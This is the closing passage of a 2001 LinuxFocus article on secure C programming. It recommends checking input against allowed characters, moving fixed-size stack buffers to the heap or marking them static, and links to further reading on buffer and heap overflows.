first character that is not part of the good character set. It returns the
length of the initial part of the string that holds only valid characters,
i.e. the index (starting from 0) of the first invalid one. You must never
reverse the logic. Don't validate against characters that you don't want.
Always check against the "good" characters.
</P>

<A NAME="190lfindex8">&nbsp;</A>
<H2>Using dynamic buffers</H2>



<P>A buffer overflow relies on writing past the end of a variable stored on the stack
and changing the return address of a function. The attack involves automatic data, which
is only allocated on the stack. A way to move the problem is to replace
the character arrays allocated on the stack with dynamic variables
located in the <EM>heap</EM>. To do this we replace the sequence</P>

<PRE>
  #define LG_STRING    128
  int fonction (...)
  {
    char array [LG_STRING];
    ...
    return (result);
  }
</PRE>

with :

<PRE>
  #define LG_STRING    128
  int fonction (...)
  {
    char *string = NULL;
    if ((string = malloc (LG_STRING)) == NULL)
        return (-1);
    memset(string,'\0',LG_STRING);
    [...]
    free (string);
    return (result);
  }
</PRE>

These lines bloat the code and risk memory leaks, but we
must take advantage of these changes to modify the approach and avoid
imposing arbitrary length limits. Note that you can't expect the same
result using <CODE>alloca()</CODE>. The code looks similar, but
<CODE>alloca()</CODE> allocates the data on the process stack, which leads to the
same problem as automatic variables.
Initializing memory to zero using
<CODE>memset()</CODE> avoids a few problems with
uninitialized variables. Again, this doesn't correct the problem;
the exploit just becomes less trivial. Those wanting to carry on with
the subject can read the article about heap overflows from w00w00.

<P>Last, let's say it's possible under some circumstances to
quickly get rid of security holes by adding the <CODE>static</CODE> keyword
before the buffer declaration. The compiler allocates this variable in the data
segment far from the process stack. It becomes impossible to get a
shell, but doesn't solve the problem of a DoS (Denial of Service) attack. Of course, this doesn't
work if the routine is called recursively. This "medicine" has to be
considered as a palliative, only used for eliminating a security hole
in an emergency without changing much of the code.</P>

<A NAME="190lfindex9">&nbsp;</A>
<H2>Conclusion</H2>



We hope this overview on buffer overflows helps you to program
more securely. Even if the exploit technique requires a good
understanding of the mechanism, the general principle is rather
accessible. On the other hand, the implementation of precautions is not
that difficult. Don't forget it's faster to make a program secure at
design time than to fix the faults later on. We'll confirm this principle in our next
article about <EM>format bugs</EM>.

<A NAME="190lfindex10">&nbsp;</A>
<H2>Links</H2>



<UL>
<LI>Christophe Blaess's page : <A href=
"http://perso.club-internet.fr/ccb/">perso.club-internet.fr/ccb/</A></LI>

<LI>Christophe Grenier's page : <A href=
"http://www.esiea.fr/public_html/Christophe.GRENIER/">www.esiea.fr/public_html/Christophe.GRENIER/</A></LI>

<LI>Fr&eacute;d&eacute;ric Raynal's page : <A href=
"http://www-rocq.inria.fr/~raynal/">www-rocq.inria.fr/~raynal/</A></LI>

<LI>Phrack Magazine : <A href=
"http://phrack.infonexus.com/">phrack.infonexus.com/</A>.</LI>

<LI>Heap overflow : <A href=
"http://www.w00w00.org/files/articles/heaptut.txt">www.w00w00.org/files/articles/heaptut.txt</A></LI>
</UL>




<!-- 2pdaIgnoreStart -->
<A NAME="talkback">&nbsp;</a>
<h2>Talkback form for this article</h2>
Every article has its own talkback page. On this page you can submit a comment or look at comments from other readers:
<center>
<table border="0"  CELLSPACING="2" CELLPADDING="1">
 <tr BGCOLOR="#C2C2C2"><td align=center>
  <table border="3"  CELLSPACING="2" CELLPADDING="1">
   <tr BGCOLOR="#C2C2C2"><td align=center>
    <A href="http://cgi.linuxfocus.org/cgi-bin/lftalkback?anum=190&amp;lang=en"><b>&nbsp;talkback page&nbsp;</b></a>
   </td></tr></table>
</td></tr></table>
</center>

<HR size="2" noshade>
<!-- ARTICLE FOOT -->
<CENTER><TABLE WIDTH="95%">
<TR><TD ALIGN=CENTER BGCOLOR="#9999AA">
<A HREF="../../common/lfteam.html">Webpages maintained by the LinuxFocus Editor team</A>
<BR><FONT COLOR="#FFFFFF">&copy;  Fr&eacute;d&eacute;ric Raynal, Christophe Blaess, Christophe Grenier, <a href="../../common/copy.html">FDL</a> <BR><a href="http://www.linuxfocus.org">LinuxFocus.org</a></FONT>
<BR><a href="http://cgi.linuxfocus.org/cgi-bin/lfcomment?lang=en&amp;article=article190.shtml" target="_TOP">Click here to report a fault or send a comment to LinuxFocus</A><BR></TD>
<TD BGCOLOR="#9999AA"><!-- TRANSLATION INFO -->
<font size=2>Translation information:</font><TABLE>
<tr><td><font size=2>fr</font></td>
    <td><font size=2>-&gt;</font></td>
    <td><font size=2>--</font></td>
    <td><font size=2><a href="mailto:pappy&#64;users.sourceforge.net,ccb@club-internet.fr,grenier@nef.esiea.fr"><FONT COLOR="#FFFFFF"> Fr&eacute;d&eacute;ric Raynal, Christophe Blaess, Christophe Grenier</FONT></a></font></td>
</tr>
<tr><td><font size=2>fr</font></td>
    <td><font size=2>-&gt;</font></td>
    <td><font size=2>en</font></td>
    <td><font size=2><a href="mailto:georges.t&#64;linuxfocus.org"><FONT COLOR="#FFFFFF">Georges Tarbouriech</FONT></a></font></td>
</tr>
<tr><td><font size=2>en</font></td>
    <td><font size=2>-&gt;</font></td>
    <td><font size=2>en</font></td>
    <td><font size=2><a href="mailto:sherm_pbody&#64;yahoo.com"><FONT COLOR="#FFFFFF">Lorne Bailey</FONT></a></font></td>
</tr>
</TABLE></TD>
</TR></TABLE></CENTER>
<p><font size=1>2001-05-01, generated by lfparser version 2.13</font></p>
<!-- 2pdaIgnoreStop -->
</BODY>
</HTML>